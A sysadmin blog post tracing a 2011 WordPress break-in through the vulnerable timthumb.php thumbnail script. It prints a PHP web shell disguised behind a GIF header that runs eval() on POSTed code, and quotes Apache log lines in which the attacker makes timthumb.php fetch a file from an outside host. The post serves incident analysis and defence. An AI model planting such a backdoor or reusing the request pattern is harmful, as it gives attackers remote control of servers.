Wordpress timthumb hack - a PHP hack story

Written by - 0 comments

Published on - Listed in Linux PHP Hacks Wordpress


And the cat and mouse game goes on and on...

As I already wrote in another post 'On a hacker's trail', it's always the same story: Admin (tries) to secure system as much as possible, hackers (might) come in, admin finds hacker and fixes vulnerability, hackers (might) find other vulnerabilities.... and so on. At least it keeps me busy ;-).

This time I stumbled over a Wordpress hack which is known since August 2011 (after some research I found that information). The first hint were exceptionally many POST entries in the access log file of a virtual host. So I checked which files were created via browser (therefore uid of Apache):

# for file in $(find . -user www-data | grep .php)
> do
> ls -l $file
> done
-rw-r--r-- 1 www-data www-data 431 2011-08-06 10:41 ./critics/wp-admin/upd.php
-rw-r--r-- 1 www-data www-data 4 2011-08-05 17:45 ./critics/wp-content/themes/InReview/cache/external_9cb702aa084691e66c789c1e98d6233a.php
-rw-r--r-- 1 www-data www-data 431 2011-08-06 10:41 ./critics/wp-content/upd.php
-rw-r--r-- 1 www-data www-data 1.6K 2011-08-21 19:39 ./photo/wp-content/themes/DeepFocus2.7/cache/external_ed59d62e1b1e2167275feed65b374079.php
-rw-r--r-- 1 www-data www-data 887 2011-10-07 20:04 ./photo/wp-content/themes/DeepFocus/cache/a31844cea72ed6c9f90b56b039bbf3f5.php
-rw-r--r-- 1 www-data www-data 15K 2011-07-20 10:59 ./photo/wp-content/w3-total-cache-config.php

There were some more files but I left out session files.

After taking a closer look at some files, I came across external_ed59d62e1b1e2167275feed65b374079.php which showed an interesting content:

# more ./photo/wp-content/themes/DeepFocus2.7/cache/external_ed59d62e1b1e2167275feed65b374079.php
GIF89a4+÷ÀÀÀÿÿÿÿÿÿÿÿÿÿÿÿ3fÌÿ3333f33Ì3ÿff3ffffÌfÿ3...
                                                                          ص
`%Á©bÒ¼#rºôùÚÒ7£Ê:øA\kömúФGÀï^L                               ý×íV~dìúZÃTj
ÊBjore--(58%)

   Ì
ùrò¹ew¢
       i7kGÏ<ý*Þ<¥³ã)ngºlpRÀ­M¢yÒ#Ú×úÛR/AuúII°2ë®<¡Ö~©¹éo¾hO»ÿuY³ë㬧f±½åè»ËÅ-âüÊ'nMÑSIV_¨5ÕÑVåe@­'URVAQcp4XYvPuV^ÈÔR|xùáxH2
ç                       ¦âV     ÔÒgãUØÑI
îùø@ûq°¥_dbYdn¹wM9¦i<ùa[il%åG·õIñfmVSç-)$`{§ÈQmd浨L-êg^ESY~Fס¶ÕVfµMÊJé\y¾Öê­¸*ê¨
Ñ@YñËÔ¥yA¶P*WëßI2!$Û9¯Å¡c5ÿÕØÇA35ÚD&íôÓP«;<?php                                   ÒVZZÚ]é°iöhFÍ ÖJ)^WÍ] Ó®
if(md5($_POST["key"]) == "f732d47960be7e806861987f98a9574c"){$Um51Å?uä%Ä5V`½
$cmd = $_POST["code"];
eval (stripslashes($cmd));
}
?>

The file starts with binary code, as if it tries to 'hide' as a non-text file, so a correct grep cannot be executed on that file:

# grep -r "eval (stripslashes" *
Binary file photo/wp-content/themes/DeepFocus2.7/cache/external_ed59d62e1b1e2167275feed65b374079.php matches

But even more interesting is the fact what happens after the binary part. The php file expects a variable '$key' via POST method. If the md5 hash of the given 'key' variable matches, then a second variable '$cmd' (also submitted by POST) will be executed on the system.

OK, so far I knew this file doesn't belong to Wordpress and it's dangerous. But how did it come on the system?

Let's take a look in the Apache logs what happened on August 21st at around 19:39 when the file was created/modified:

91.224.160.182 - - [21/Aug/2011:19:38:58 +0200] "GET /photo/wp-content/themes/DeepFocus2.7/thumb.php?src=http://blogger.com.bloggera.net/images.php HTTP/1.1" 404 22638 "" "Opera/9.80 (Windows NT 6.
1; U; en) Presto/2.6.30 Version/10.62"

91.224.160.182 - - [21/Aug/2011:19:38:58 +0200] "GET /photo/wp-content/themes/DeepFocus2.7/timthumb.php?src=http://blogger.com.bloggera.net/images.php HTTP/1.1" 200 10557 "" "Opera/9.80 (Windows NT
 6.1; U; en) Presto/2.6.30 Version/10.62"

The hacker first tried to use thumb.php - but this file doesn't exist. On the second try he was successful by using timthumb.php, a php script to upload images which obviously is vulnerable.

So this is the source and this needs to be fixed.

This hack was first discovered by Mark Maunder on August 1st 2011 and he explains in a very good article how it was possible to use timthumb.php (very easy in fact!).

Another good article can be found on this page.


Add a comment

Show form to leave a comment

Comments (newest first)

No comments yet.

RSS feed

Blog Tags:

  AWS   Android   Ansible   Apache   Apple   Atlassian   BSD   Backup   Bash   Bluecoat   CMS   Chef   Cloud   Coding   Consul   Containers   CouchDB   DB   DNS   Database   Databases   Docker   ELK   Elasticsearch   Filebeat   FreeBSD   Galera   Git   GlusterFS   Grafana   Graphics   HAProxy   HTML   Hacks   Hardware   Icinga   Influx   Internet   Java   KVM   Kibana   Kodi   Kubernetes   LVM   LXC   Linux   Logstash   Mac   Macintosh   Mail   MariaDB   Minio   MongoDB   Monitoring   Multimedia   MySQL   NFS   Nagios   Network   Nginx   OSSEC   OTRS   Office   PGSQL   PHP   Perl   Personal   PostgreSQL   Postgres   PowerDNS   Proxmox   Proxy   Python   Rancher   Rant   Redis   Roundcube   SSL   Samba   Seafile   Security   Shell   SmartOS   Solaris   Surveillance   Systemd   TLS   Tomcat   Ubuntu   Unix   VMWare   VMware   Varnish   Virtualization   Windows   Wireless   Wordpress   Wyse   ZFS   Zoneminder